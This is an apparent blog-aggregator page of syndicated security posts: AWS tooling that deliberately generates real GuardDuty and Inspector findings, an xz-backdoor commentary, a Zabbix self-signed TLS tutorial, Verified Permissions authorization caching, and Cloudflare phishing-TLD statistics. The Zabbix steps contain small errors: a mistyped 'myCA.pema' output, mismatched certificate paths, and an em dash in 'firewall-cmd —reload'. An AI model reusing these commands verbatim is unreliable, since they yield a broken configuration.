1. guardduty_remediation_eks_rule – When a GuardDuty finding for EKS is created, a Lambda function attempts to delete the EKS resources. Subscribed users are notified of the finding through the deployed SNS topic.
2. guardduty_remediation_credexfil_rule – When a GuardDuty finding for InstanceCredentialExfiltration is created, a Lambda function is used to revoke the IAM role’s temporary security credentials and AWS permissions. Subscribed users are notified of the finding through the deployed SNS topic.
3. guardduty_respond_IAMUser_rule – When a GuardDuty finding for IAM is created, subscribed users are notified through the deployed SNS topic. There is no remediation activity triggered by this rule.
4. Guardduty_notify_S3_rule – When a GuardDuty finding for Amazon S3 is created, subscribed users are notified through the deployed Amazon SNS topic. This rule doesn’t invoke any remediation activity.
The following Lambda functions are created:
1. guardduty_iam_remediation_function – This function revokes active sessions and sends a notification to the SNS topic.
2. eks_cleanup_function – This function deletes the EKS resources in the EKS CloudFormation template.
  
  Note: Upon attempts to delete the overall sample CloudFormation stack, this runs to delete the EKS CloudFormation template.
An S3 bucket stores EC2 user data scripts run from the EC2 instances

Solution deployment

You can deploy the SecurityFindingGeneratorStack solution by using either the AWS Management Console or the AWS Cloud Development Kit (AWS CDK).

Option 1: Deploy the solution with AWS CloudFormation using the console

Use the console to sign in to your chosen AWS account and then choose the Launch Stack button to open the AWS CloudFormation console pre-loaded with the template for this solution. It takes approximately 10 minutes for the CloudFormation stack to complete.

Option 2: Deploy the solution by using the AWS CDK

You can find the latest code for the SecurityFindingGeneratorStack solution in the SecurityFindingGeneratorStack GitHub repository, where you can also contribute to the sample code. For instructions and more information on using the AWS Cloud Development Kit (AWS CDK), see Get Started with AWS CDK.

To deploy the solution by using the AWS CDK

To build the app when navigating to the project’s root folder, use the following commands:
```
npm install -g aws-cdk-lib
npm install
```
Run the following command in your terminal while authenticated in your separate deployment AWS account to bootstrap your environment. Be sure to replace <INSERT_AWS_ACCOUNT> with your account number and replace <INSERT_REGION> with the AWS Region that you want the solution deployed to.
```
cdk bootstrap aws://<INSERT_AWS_ACCOUNT>/<INSERT_REGION>
```
Deploy the stack to generate findings based on a specific parameter that is passed. The following parameters are available:
1. inspector
2. guardduty
```
cdk deploy SecurityFindingGeneratorStack –parameters securityserviceuserdata=inspector
```

Reviewing security findings

After the solution successfully deploys, security findings should start appearing in your AWS account’s GuardDuty console within a couple of minutes.

Amazon GuardDuty findings

In order to create a diverse set of GuardDuty findings, the solution uses Amazon EC2 user data to run scripts. Those scripts can be found in the sample repository. You can also review and change scripts as needed to fit your use case or to remove specific actions if you don’t want specific resources to be altered or security findings to be generated.

A comprehensive list of active GuardDuty finding types and details for each finding can be found in the Amazon GuardDuty user guide. In this solution, activities which cause the following GuardDuty findings to be generated, are performed:

To generate the EKS security findings, the EKS Deployment EC2 instance is running eksctl commands that deploy CloudFormation templates. If the EKS cluster doesn’t deploy, it might be because of capacity restraints in a specific Availability Zone. If this occurs, manually delete the failed EKS CloudFormation templates.

If you want to create the EKS cluster and security findings manually, you can do the following:

Sign in to the Amazon EC2 console.
Connect to the EKS Deployment EC2 instance using an IAM role that has access to start a session through Systems Manager. After connecting to the ssm-user, issue the following commands in the Session Manager session:
1. sudo chmod 744 /home/ec2-user/guardduty-script.sh
2. chown ec2-user /home/ec2-user/guardduty-script.sh
3. sudo /home/ec2-user/guardduty-script.sh

It’s important that your security analysts have an incident response playbook. If playbooks don’t exist, you can refer to the GuardDuty remediation recommendations or AWS sample incident response playbooks to get started building playbooks.

Amazon Inspector findings

The findings for Amazon Inspector are generated by using the open source Vulhub collection. The open source collection has pre-built vulnerable Docker environments that pull images into Amazon ECR.

The Amazon Inspector findings that are created vary depending on what exists within the open source library at deployment time. The following are examples of findings you will see in the console:

For Amazon Inspector findings, you can refer to parts 1 and 2 of Automate vulnerability management and remediation in AWS using Amazon Inspector and AWS Systems Manager.

Clean up

If you deployed the security finding generator solution by using the Launch Stack button in the console or the CloudFormation template security_finding_generator_cfn, do the following to clean up:

In the CloudFormation console for the account and Region where you deployed the solution, choose the SecurityFindingGeneratorStack stack.
Choose the option to Delete the stack.

If you deployed the solution by using the AWS CDK, run the command cdk destroy.

Important: The solution uses eksctl to provision EKS resources, which deploys additional CloudFormation templates. There are custom resources within the solution that will attempt to delete the provisioned CloudFormation templates for EKS. If there are any issues, you should verify and manually delete the following CloudFormation templates:

eksctl-GuardDuty-Finding-Demo-cluster
eksctl-GuardDuty-Finding-Demo-addon-iamserviceaccount-kube-system-aws-node
eksctl-GuardDuty-Finding-Demo-nodegroup-ng-<GUID>

Conclusion

In this blog post, I showed you how to deploy a solution to provision resources in an AWS account to generate security findings. This solution provides a technical framework to conduct periodic simulations within your AWS environment. By having real, rather than simulated, security findings, you can enable your security teams to interact with actual resources and validate existing incident response processes. Having a repeatable mechanism to create security findings also provides your security team the opportunity to develop and test automated incident response capabilities in your AWS environment.

AWS has multiple services to assist with increasing your organization’s security posture. Security Hub provides native integration with AWS security services as well as partner services. From Security Hub, you can also implement automation to respond to findings using custom actions as seen in Use Security Hub custom actions to remediate S3 resources based on Amazon Macie discovery results. In part two of a two-part series, you can learn how to use Amazon Detective to investigate security findings in EKS clusters. Amazon Security Lake automatically normalizes and centralizes your data from AWS services such as Security Hub, AWS CloudTrail, VPC Flow Logs, and Amazon Route 53, as well as custom sources to provide a mechanism for comprehensive analysis and visualizations.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Incident Response re:Post or contact AWS Support.

The xz Backdoor Should Not Happen Again

2024-04-01 Bozho

Post Syndicated from Bozho original https://techblog.bozho.net/the-xz-backdoor-should-not-happen-again/

A few days ago a significant supply chain attack attempt was accidentally revealed – the xz utiliy was compromised, likely by a nation state, in order to plant a backdoor which allows sniffing on encrypted traffic.

The xz library is a building block of many other packages and is basically ubiquitous. A famous XKCD strip describes the situation graphically:

Dependency

This means that if it wasn’t accidentally discovered due to worsened performance, we would eventually have a carefully planted backdoor on practically every Linux server out there. This is a major issue and even though open source security is better than closed source security, even if just by allowing backdoors to be discovered by anyone, we need to address such nation state attempts of planting backdoors.

I propose two complementary measures:

Public funding for open source – the EU and the US need to create a structured, not overly bureaucratic process to fund the maintenance of core open source projects (like xz). Germany has done a good job in setting up its Sovereign tech fund, but we need broader instruments that make sure there is no open source abandonware on which many other projects depend. Currently large corporations often fund the development of open source, but xz is an example that the little building blocks may fall through the cracks. Open source funding can also be directed at systematic security analysis of open source projects (like the one in point 2, but not limited the security services).
Analyzing high-risk project – security services and other public and private organizations need to first pinpoint high-risk projects (ones that if compromised, cause a huge risk that trickles down to the whole ecosystem), rank projects based on risk, and then analyze no just source code, but also maintenance activities, maintainer recruitment and churn, commit patterns and so on. In hindsight, the xz backdoor could have been caught by monitoring such metadata and the suspicious activities by the “hacker”. We, of course, need (open source) tools to do these analysis, but also highly-skilled people in the security services of larger countries.

Overall, we can and should learn lessons and take measures based on this incident. Because the next one might not cause noticeable performance degradation and get into actual production, which will be devastating.

The post The xz Backdoor Should Not Happen Again appeared first on Bozho's tech blog.

Securing the Zabbix Frontend

2024-03-27 Patrik Uytterhoeven

Post Syndicated from Patrik Uytterhoeven original https://blog.zabbix.com/securing-the-zabbix-frontend/27700/

The frontend is what we use to login into our system. The Zabbix frontend will connect to our Zabbix server and our database. But we also send information from our laptop to the frontend. It’s important that when we enter our credentials that we can do this in a safe way. So it makes sense to make use of certificates and one way to do this is by making use of self-signed certificates.

To give you a better understanding of why your browser will warn you when using self-signed certificates, we have to know that when we request an SSL certificate from an official Certificate Authority (CA) that you submit a Certificate Signing Request (CSR) to them. They in return provide you with a Signed SSL certificate. For this, they make use of their root certificate and private key.

Our browser comes with a copy of the root certificate (CA) from various authorities, or it can access it from the OS. This is why our self-signed certificates are not trusted by our browser – we don’t have any CA validation. Our only workaround is to create our own root certificate and private key.

Table of Contents

Understanding the concepts

How to create an SSL certificate:

How SSL works – Client – Server flow:

NOTE: I have borrowed the designs from this video, which does a good job of explaining how SSL works.

Securing the Frontend with self signed SSL on Nginx

In order to configure this, there are a few steps that we need to follow:

Generate a private key for the CA ( Certificate Authority )
Generate a root certificate
Generate CA-Authenticated Certificates
Generate a Certificate Signing Request (CSR)
Generate an X509 V3 certificate extension configuration file
Generate the certificate using our CSR, the CA private key, the CA certificate, and the config file
Copy the SSL certificates to your Virtual Host
Adapt your Nginx Zabbix config

Generate a private key for the CA

The first step is to make a folder named “SSL” so we can create our certificates and save them:

>- mkdir ~/ssl
>- cd ~/ssl
>- openssl ecparam -out myCA.key -name prime256v1 -genkey

Let’s explain all the options:

openssl : The tool to use the OpenSSL library, which provides us with cryptographic functions and utilities
out myCA.key : This part of the command specifies the output file name for the generated private key
name prime256v1: The name of the elliptic curve; X9.62/SECG curve over a 256 bit prime field
ecparam: This command is used to manipulate or generate EC parameter files
genkey: This option will generate an EC private key using the specified parameters

Generate a Root Certificate

openssl req -x509 -new -nodes -key myCA.key -sha256 -days 1825 -out myCA.pema

Let’s explain all the options:

openssl: The command-line tool for OpenSSL
req: This command is used for X.509 certificate signing request (CSR) management
x509: This option specifies that a self-signed certificate should be created
new: This option is used to generate a new certificate
nodes: This option indicates that the private key should not be encrypted. It will generates a private key without a passphrase, making it more
convenient but potentially less secure
key myCA.key: This specifies the private key file (myCA.key) to be used in generating the certificate
sha256: This option specifies the hash algorithm to be used for the certificate. In this case, SHA-256 is chosen for stronger security
days 1825: This sets the validity period of the certificate in days. Here, it’s set to 1825 days (5 years)
out myCA.pem: This specifies the output file name for the generated certificate. In this case, “myCA.pem”

The information you enter is not so important, but it’s best to fill it in as comprehensively as possible. Just make sure you enter for CN your IP or DNS.

You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [XX]:BE
State or Province Name (full name) []:vlaams-brabant
Locality Name (eg, city) [Default City]:leuven
Organization Name (eg, company) [Default Company Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (eg, your name or your server's hostname) []:192.168.0.134
Email Address []:

Generate CA-Authenticated Certificates

It’s probably good practice to use the dns name of your webiste in the name for the private key. As we use in this case an IP address rather than a dns, I will use the fictive dns zabbix.mycompany.internal.

openssl genrsa -out zabbix.mycompany.internal.key 2048

Generate a Certificate Signing Request (CSR)

openssl req -new -key zabbix.mycompany.internal.key -out zabbix.mycompany.internal.csr

You will be asked the same set of questions as above. Once again, your answers hold minimal significance and in our case no one will inspect the certificate, so they matter even less.

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

Generate an X509 V3 certificate extension configuration file

# vi zabbix.mycompany.internal.ext

Add the following lines in your certificate extension file. Replace IP or DNS with your own values.

authorityKeyIdentifier=keyid,issuer
basicConstraints=CA:FALSE
keyUsage = digitalSignature, nonRepudiation, keyEncipherment, dataEncipherment
subjectAltName = @alt_names

[alt_names]
IP.1 = 192.168.0.133
#DNS.1 = MYDNS (You can use DNS if you have a dns name if you use IP then use the above line)

Generate the certificate using our CSR, the CA private key, the CA certificate, and the config file

openssl x509 -req -in zabbix.mycompany.internal.csr -CA myCA.pem -CAkey myCA.key \
-CAcreateserial -out zabbix.mycompany.internal.crt -days 825 -sha256 -extfile zabbix.mycompany.internal.ext

Copy the SSL certificates to our Virtual Host

cp zabbix.mycompany.internal.crt /etc/pki/tls/certs/.
cp zabbix.mycompany.internal.key /etc/pki/tls/private/.

Import the CA in Linux (RHEL)

We need to update the CA certificates, so run the below command to update the CA certs.

cp myCA.pem /etc/pki/ca-trust/source/anchors/myCA.crt
update-ca-trust extract

Import the CA in OSX

Open the macOS Keychain app
Navigate to File > Import Items
Choose your private key file (i.e., myCA.pem)
Search for the “Common Name” you provided earlier
Double-click on your root certificate in the list
Expand the Trust section
Modify the “When using this certificate:” dropdown to “Always Trust”
Close the certificate window

Import the CA in Windows

Open the “Microsoft Management Console” by pressing Windows + R, typing mmc, and clicking Open
Navigate to File > Add/Remove Snap-in
Select Certificates and click Add
Choose Computer Account and proceed by clicking Next
Select Local Computer and click Finish
Click OK to return to the MMC window
Expand the view by double-clicking Certificates (local computer)
Right-click on Certificates under “Object Type” in the middle column, select All Tasks, and then Import
Click Next, followed by Browse. Change the certificate extension dropdown next to the filename field to All Files (.) and locate the myCA.pem file
Click Open, then Next
Choose “Place all certificates in the following store.” with “Trusted Root Certification Authorities store” as the default. Proceed by clicking Next, then Finish, to finalize the wizard
If all went well you should find your certificate under Trusted Root Certification Authorities > Certificates

Warning! You also need to import the myCA.crt file in your OS. We are not an official CA, so we have to import it in our OS and tell it to trust this Certificate. This action depends on the OS you use.

As you are using OpenSSL, you should also create a strong Diffie-Hellman group, which is used in negotiating Perfect Forward Secrecy with clients. You can do this by typing:

openssl dhparam -out /etc/ssl/certs/dhparam.pem 2048

Adapt your Nginx Zabbix config

Add the following lines to your Nginx configuration, modifying the file paths as needed. Replace the existing lines with port 80 with this configuration. This will enable SSL and HTTP2.

# vi /etc/nginx/conf.d/zabbix.conf
server {
listen 443 http2 ssl;
listen [::]:443 http2 ssl;
server_name <ip qddress>;
ssl_certificate /etc/ssl/certs/zabbix.mycompany.internal.crt;
ssl_certificate_key /etc/pki/tls/private/zabbix.mycompany.internal.key;
ssl_dhparam /etc/ssl/certs/dhparam.pem;

To redirect traffic from port 80 to 443 we can add the following lines above our https block:

server {
listen 80;
server_name _; #dns or ip is also possible
return 301 https://$host$request_uri;
}

Restart all services and allow https traffic

systemctl restart php-fpm.service
systemctl restart nginx

firewall-cmd --add-service=https --permanent
firewall-cmd —reload

When we go to our url http://<IP or DNS>/ we get redirected to our https:// page and when we check we can see that our site is secure:

You can check out this article in its original form (and keep an eye out for more of Patrik’s helpful tips) at https://trikke76.github.io/Zabbix-Book/security/securing-zabbix/.

The post Securing the Zabbix Frontend appeared first on Zabbix Blog.

Use Amazon Verified Permissions for fine-grained authorization at scale

2024-03-26 Abhishek Panday

Post Syndicated from Abhishek Panday original https://aws.amazon.com/blogs/security/use-amazon-verified-permissions-for-fine-grained-authorization-at-scale/

Implementing user authentication and authorization for custom applications requires significant effort. For authentication, customers often use an external identity provider (IdP) such as Amazon Cognito. Yet, authorization logic is typically implemented in code. This code can be prone to errors, especially as permissions models become complex, and presents significant challenges when auditing permissions and deciding who has access to what. As a result, within Common Weakness Enumeration’s (CWE’s) list of the Top 25 Most Dangerous Software Weaknesses for 2023, four are related to incorrect authorization.

At re:Inforce 2023, we launched Amazon Verified Permissions, a fine-grained permissions management service for the applications you build. Verified Permissions centralizes permissions in a policy store and lets developers use those permissions to authorize user actions within their applications. Permissions are expressed as Cedar policies. You can learn more about the benefits of moving your permissions centrally and expressing them as policies in Policy-based access control in application development with Amazon Verified Permissions.

In this post, we explore how you can provide a faster and richer user experience while still authorizing all requests in the application. You will learn two techniques—bulk authorization and response caching—to improve the efficiency of your applications. We describe how you can apply these techniques when listing authorized resources and actions and loading multiple components on webpages.

Use cases

You can use Verified Permissions to enforce permissions that determine what the user is able to see at the level of the user interface (UI), and what the user is permitted to do at the level of the API.

UI permissions enable developers to control what a user is allowed see in the application. Developers enforce permissions in the UI to control the list of resources a user can see and the actions they can take. For example, a UI-level permission in a banking application might determine whether a transfer funds button is enabled for a given account.
API permissions enable developers to control what a user is allowed to do in an application. Developers control access to individual API calls made by an application on behalf of the user. For example, an API-level permission in a banking application might determine whether a user is permitted to initiate a funds transfer from an account.

Cedar provides consistent and readable policies that can be used at both the level of the UI and the API. For example, a single policy can be checked at the level of the UI to determine whether to show the transfer funds button and checked at the level of the API to determine authority to initiate the funds transfer.

Challenges

Verified Permissions can be used for implementing fine-grained API permissions. Customer applications can use Verified Permissions to authorize API requests, based on centrally managed Cedar policies, with low latency. Applications authorize such requests by calling the IsAuthorized API of the service, and the response contains whether the request is allowed or denied. Customers are happy with the latency of individual authorization requests, but have asked us to help them improve performance for use cases that require multiple authorization requests. They typically mention two use cases:

Compound authorization: Compound authorization is needed when one high-level API action involves many low-level actions, each of which has its own permissions. This requires the application to make multiple requests to Verified Permissions to authorize the user action. For example, in a banking application, loading a credit card statement requires three API calls: GetCreditCardDetails, GetCurrentStatement, and GetCreditLimit. This requires three calls to Verified Permissions, one for each API call.
UI permissions: Developers implement UI permissions by calling the same authorization API for every possible resource a principal can access. Each request involves an API call, and the UI can only be presented after all of them have completed. Alternatively, for a resource-centric view, the application can make the call for multiple principals to determine which ones have access.

Solution

In this post, we show you two techniques to optimize the application’s latency based on API permissions and UI permissions.

Batch authorization allows you to make up to 30 authorization decisions in a single API call. This feature was released in November 2023. See the what’s new post and API specifications to learn more.
Response caching enables you to cache authorization responses in a policy enforcement point such as Amazon API Gateway, AWS AppSync, or AWS Lambda. You can cache responses using native enforcement point caches (for example, API Gateway caching) or managed caching services such as Amazon ElastiCache.

Solving for enforcing fine grained permissions while delivering a great user experience

You can use UI permissions to authorize what resources and actions a user can view in an application. We see developers implementing these controls by first generating a small set of resources based on database filters and then further reducing the set down to authorized resources by checking permissions on each resource using Verified Permissions. For example, when a user of a business banking system tries to view balances on company bank accounts, the application first filters the list to the set of bank accounts for that company. The application then filters the list further to only include the accounts that the user is authorized to view by making an API request to Verified Permissions for each account in the list. With batch authorization, the application can make a single API call to Verified Permissions to filter the list down to the authorized accounts.

Similarly, you can use UI permissions to determine what components of a page or actions should be visible to users of the application. For example, in a banking application, the application wants to control the sub-products (such as credit card, bank account, or stock trading) visible to a user or only display authorized actions (such as transfer or change address) when displaying an account overview page. Customers want to use Verified Permissions to determine which components of the page to display, but that can adversely impact the user experience (UX) if they make multiple API calls to build the page. With batch authorization, you can make one call to Verified Permissions to determine permissions for all components of the page. This enables you to provide a richer experience in your applications by displaying only the components that the user is allowed to access while maintaining low page load latency.

Solving for enforcing permissions for every API call without impacting performance

Compound authorization is where a single user action results in a sequence of multiple authorization calls. You can use bulk authorization combined with response caching to improve efficiency. The application makes a single bulk authorization request to Verified Permissions to determine whether each of the component API calls are permitted and the response is cached. This cache is then referenced for each component’s API call in the sequence.

Sample application – Use cases, personas, and permissions

We’re using an online order management application for a toy store to demonstrate how you can apply batch authorization and response caching to improve UX and application performance.

One function of the application is to enable employees in a store to process online orders.

Personas

The application is used by two types of users:

Pack associates are responsible for picking, packing, and shipping orders. They’re assigned to a specific department.
Store managers are responsible for overseeing the operations of a store.

Use cases

The application supports these use cases:

Listing orders: Users can list orders. A user should only see the orders for which they have view permissions.
- Pack associates can list all orders of their department.
- Store managers can list all orders of their store.
Figure 1 shows orders for Julian, who is a pack associate in the Soft Toy department

Figure 1: Orders for Julian in the Soft Toy department
Order actions: Users can take some actions on an order. The application enables the relevant UI elements based on the user’s permissions.
- Pack associates can select Get Box Size and Mark as Shipped, as shown in Figure 2.
- Store managers can select Get Box Size, Mark as Shipped, Cancel Order, and Route to different warehouse.
Figure 2: Actions available to Julian as a pack associate
Viewing an order: Users can view the details of a specific order. When a user views an order, the application loads the details, label, and receipt. Figure 3 shows the available actions for Julian who is a pack associate.

Figure 3: Order Details for Julian, showing permitted actions

Policy design

The application uses Verified Permissions as a centralized policy store. These policies are expressed in Cedar. The application uses the Role management using policy templates approach for implementing role-based access controls. We encourage you to read best practices for using role-based access control in Cedar to understand if the approach fits your use case.

In the sample application, the policy template for the store owner role looks like the following:

permit (
        principal == ?principal,
        action in [
                avp::sample::toy::store::Action::"OrderActions",
                avp::sample::toy::store::Action::"AddPackAssociate",
                avp::sample::toy::store::Action::"AddStoreManager",
                avp::sample::toy::store::Action::"ListPackAssociates",
                avp::sample::toy::store::Action::"ListStoreManagers"
        ],
        resource in ?resource
);

When a user is assigned a role, the application creates a policy from the corresponding template by passing the user and store. For example, the policy created for the store owner is as follows:

permit (
    principal ==  avp::sample::toy::store::User::"test_user_pool|sub_store_manager_user", 
    action in  [
                avp::sample::toy::store::Action::"OrderActions",
                avp::sample::toy::store::Action::"AddPackAssociate",
                avp::sample::toy::store::Action::"AddStoreManager",
                avp::sample::toy::store::Action::"ListPackAssociates",
                avp::sample::toy::store::Action::"ListStoreManagers"
    ],
    resource in avp::sample::toy::store::Store::"toy store 1"
);

To learn more about the policy design of this application, see the readme file of the application.

Use cases – Design and implementation

In this section, we discuss high level design, challenges with the barebones integration, and how you can use the preceding techniques to reduce latency and costs.

Listing orders

Figure 4: Architecture for listing orders

As shown in Figure 4, the process to list orders is:

The user accesses the application hosted in AWS Amplify.
The user then authenticates through Amazon Cognito and obtains an identity token.
The application uses Amplify to load the order page. The console calls the API ListOrders to load the order.
The API is hosted in API Gateway and protected by a Lambda authorizer function.
The Lambda function collects entity information from an in-memory data store to formulate the isAuthorized request.
Then the Lambda function invokes Verified Permissions to authorize the request. The function checks against Verified Permissions for each order in the data store for the ListOrder call. If Verified Permissions returns deny, the order is not provided to the user. If Verified Permissions returns allow, the request is moved forward.

Challenge

Figure 5 shows that the application called IsAuthorized multiple times, sequentially. Multiple sequential calls cause the page to be slow to load and increase infrastructure costs.

Figure 5: Graph showing repeated calls to IsAuthorized

Reduce latency using batch authorization

If you transition to using batch authorization, the application can receive 30 authorization decisions with a single API call to Verified Permissions. As you can see in Figure 6, the time to authorize has reduced from close to 800 ms to 79 ms, delivering a better overall user experience.

Figure 6: Reduced latency by using batch authorization

Order actions

Figure 7: Order actions architecture

As shown in Figure 7, the process to get authorized actions for an order is:

The user goes to the application landing page on Amplify.
The application calls the Order actions API at API Gateway
The application sends a request to initiate order actions to display only authorized actions to the user.
The Lambda function collects entity information from an in-memory data store to formulate the isAuthorized request.
The Lambda function then checks with Verified Permissions for each order action. If Verified Permissions returns deny, the action is dropped. If Verified Permissions returns allow, the request is moved forward and the action is added to a list of order actions to be sent in a follow-up request to Verified Permissions to provide the actions in the user’s UI.

Challenge

As you saw with listing orders, Figure 8 shows how the application is still calling IsAuthorized multiple times, sequentially. This means the page remains slow to load and has increased impacts on infrastructure costs.

Figure 8: Graph showing repeated calls to IsAuthorized

Reduce latency using batch authorization

If you add another layer by transitioning to using batch authorization once again, the application can receive all decisions with a single API call to Verified Permissions. As you can see from Figure 9, the time to authorize has reduced from close to 500 ms to 150 ms, delivering an improved user experience.

Figure 9: Graph showing results of layering batch authorization

Viewing an order

Figure 10: Order viewing architecture

The process to view an order, shown in Figure 10, is:

The user accesses the application hosted in Amplify.
The user authenticates through Amazon Cognito and obtains an identity token.
The application calls three APIs hosted at API Gateway.
The API’s: Get order details, Get label, and Get receipt are targeted sequentially to load the UI for the user in the application.
A Lambda authorizer protects each of the above-mentioned APIs and is launched for each invoke.
The Lambda function collects entity information from an in-memory data store to formulate the isAuthorized request.
For each API, the following steps are repeated. The Lambda authorizer is invoked three times during page load.
1. The Lambda function invokes Verified Permissions to authorize the request. If Verified Permissions returns deny, the request is rejected and an HTTP unauthorized response (403) is sent back. If Verified Permissions returns allow, the request is moved forward.
2. If the request is allowed, API Gateway calls the Lambda Order Management function to process the request. This is the primary Lambda function supporting the application and typically contains the core business logic of the application.

Challenge

In using the standard authorization pattern for this use case, the application calls Verified Permissions three times. This is because the user action to view an order requires compound authorization because each API call made by the console is authorized. While this enforces least privilege, it impacts the page load and reload latency of the application.

Reduce latency using batch authorization and decision caching

You can use batch authorization and decision caching to reduce latency. In the sample application, the cache is maintained by API Gateway. As shown in Figure 11, applying these techniques to the console application results in only one call to Verified Permissions, reducing latency.

Figure 11: Batch authorization with decision caching architecture

The decision caching processshown in Figure 11, is:

The user accesses the application hosted in Amplify.
The user then authenticates through Amazon Cognito and obtains an identity token.
The application then calls three APIs hosted at API Gateway
When the Lambda function for the Get order details API is invoked, it uses the Lambda Authorizer to call batch authorization to get authorization decisions for the requested action, Get order details, and related actions, Get label and Get receipt.
A Lambda authorizer protects each of the above-mentioned APIs but because of batch authorization, is invoked only once.
The Lambda function collects entity information from an in-memory data store to formulate the isAuthorized request.
The Lambda function invokes Verified Permissions to authorize the request. If Verified Permissions returns deny, the request is rejected and an HTTP unauthorized response (403) is sent back. If Verified Permissions returns allow, the request is moved forward.
1. API Gateway caches the authorization decision for all actions (the requested action and related actions).
2. If the request is allowed by the Lambda authorizer function, API Gateway calls the order management Lambda function to process the request. This is the primary Lambda function supporting the application and typically contains the core business logic of the application.
3. When subsequent APIs are called, the API Gateway uses the cached authorization decisions and doesn’t use the Lambda authorization function.

Caching considerations

You’ve seen how you can use caching to implement fine-grained authorization at scale in your applications. This technique works well when your application has high cache hit rates, where authorization results are frequently loaded from the cache. Applications where the users initiate the same action multiple times or have a predictable sequence of actions will observe high cache hit rates. Another consideration is that employing caching can delay the time between policy updates and policy enforcement. We don’t recommend using caching for authorization decisions if your application requires policies to take effect quickly or your policies are time dependent (for example, a policy that gives access between 10:00 AM and 2:00 PM).

Conclusion

In this post, we showed you how to implement fine grained permissions in application at scale using Verified Permissions. We covered how you can use batch authorization and decision caching to improve performance and ensure Verified Permissions remains a cost-effective solution for large-scale applications. We applied these techniques to a demo application, avp-toy-store-sample, that is available to you for hands-on testing. For more information about Verified Permissions, see the Amazon Verified Permissions product details and Resources.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

From .com to .beauty: The evolving threat landscape of unwanted email

2024-03-26 João Tomé

Post Syndicated from João Tomé original https://blog.cloudflare.com/top-level-domains-email-phishing-threats

You’re browsing your inbox and spot an email that looks like it’s from a brand you trust. Yet, something feels off. This might be a phishing attempt, a common tactic where cybercriminals impersonate reputable entities — we’ve written about the top 50 most impersonated brands used in phishing attacks. One factor that can be used to help evaluate the email’s legitimacy is its Top-Level Domain (TLD) — the part of the email address that comes after the dot.

In this analysis, we focus on the TLDs responsible for a significant share of malicious or spam emails since January 2023. For the purposes of this blog post, we are considering malicious email messages to be equivalent to phishing attempts. With an average of 9% of 2023’s emails processed by Cloudflare’s Cloud Email Security service marked as spam and 3% as malicious, rising to 4% by year-end, we aim to identify trends and signal which TLDs have become more dubious over time. Keep in mind that our measurements represent where we observe data across the email delivery flow. In some cases, we may be observing after initial filtering has taken place, at a point where missed classifications are likely to cause more damage. This information derived from this analysis could serve as a guide for Internet users, corporations, and geeks like us, searching for clues, as Internet detectives, in identifying potential threats. To make this data readily accessible, Cloudflare Radar, our tool for Internet insights, now includes a new section dedicated to email security trends.

Cyber attacks often leverage the guise of authenticity, a tactic Cloudflare thwarted following a phishing scheme similar to the one that compromised Twilio in 2022. The US Cybersecurity and Infrastructure Security Agency (CISA) notes that 90% of cyber attacks start with phishing, and fabricating trust is a key component of successful malicious attacks. We see there are two forms of authenticity that attackers can choose to leverage when crafting phishing messages, visual and organizational. Attacks that leverage visual authenticity rely on attackers using branding elements, like logos or images, to build credibility. Organizationally authentic campaigns rely on attackers using previously established relationships and business dynamics to establish trust and be successful.

Our findings from 2023 reveal that recently introduced generic TLDs (gTLDs), including several linked to the beauty industry, are predominantly used both for spam and malicious attacks. These TLDs, such as .uno, .sbs, and .beauty, all introduced since 2014, have seen over 95% of their emails flagged as spam or malicious. Also, it’s important to note that in terms of volume, “.com” accounts for 67% of all spam and malicious emails (more on that below).

TLDs	2023 Spam %	2023 Malicious %	2023 Spam + malicious %	TLD creation
.uno	62%	37%	99%	2014
.sbs	64%	35%	98%	2021
.best	68%	29%	97%	2014
.beauty	77%	20%	97%	2021
.top	74%	23%	97%	2014
.hair	78%	18%	97%	2021
.monster	80%	17%	96%	2019
.cyou	34%	62%	96%	2020
.wiki	69%	26%	95%	2014
.makeup	32%	63%	95%	2021

Email and Top-Level Domains history

In 1971, Ray Tomlinson sent the first networked email over ARPANET, using the @ character in the address. Five decades later, email remains relevant but also a key entry point for attackers.

Before the advent of the World Wide Web, email standardization and growth in the 1980s, especially within academia and military communities, led to interoperability. Fast forward 40 years, and this interoperability is once again a hot topic, with platforms like Threads, Mastodon, and other social media services aiming for the open communication that Jack Dorsey envisioned for Twitter. So, in 2024, it’s clear that social media, messaging apps like Slack, Teams, Google Chat, and others haven’t killed email, just as “video didn’t kill the radio star.”

The domain name system, managed by ICANN, encompasses a variety of TLDs, from the classic “.com” (1985) to the newer generic options. There are also the country-specific (ccTLDs), where the Internet Assigned Numbers Authority (IANA) is responsible for determining an appropriate trustee for each ccTLD. An extensive 2014 expansion by ICANN was designed to “increase competition and choice in the domain name space,” introducing numerous new options for specific professional, business, and informational purposes, which in turn, also opened up new possibilities for phishing attempts.

3.4 billion unwanted emails

Cloudflare’s Cloud Email Security service is helping protect our customers, and that also comes with insights. In 2022, Cloudflare blocked 2.4 billion unwanted emails, and in 2023 that number rose to over 3.4 billion unwanted emails, 26% of all messages processed. This total includes spam, malicious, and “bulk” (practice of sending a single email message, unsolicited or solicited, to a large number of recipients simultaneously) emails. That means an average of 9.3 million per day, 6500 per minute, 108 per second.

Bear in mind that new customers also make the numbers grow — in this case, driving a 42% increase in unwanted emails from 2022 to 2023. But this gives a sense of scale in this email area. Those unwanted emails can include malicious attacks that are difficult to detect, becoming more frequent, and can have devastating consequences for individuals and businesses that fall victim to them. Below, we’ll give more details on email threats, where malicious messages account for almost 3% of emails averaged across all of 2023 and it shows a growth tendency during the year, with higher percentages in the last months of the year. Let’s take a closer look.

Top phishing TLDs (and types of TLDs)

First, let’s start with an 2023 overview of top level domains with a high percentage of spam and malicious messages. Despite excluding TLDs with fewer than 20,000 emails, our analysis covers unwanted emails considered to be spam and malicious from more than 350 different TLDs (and yes, there are many more).

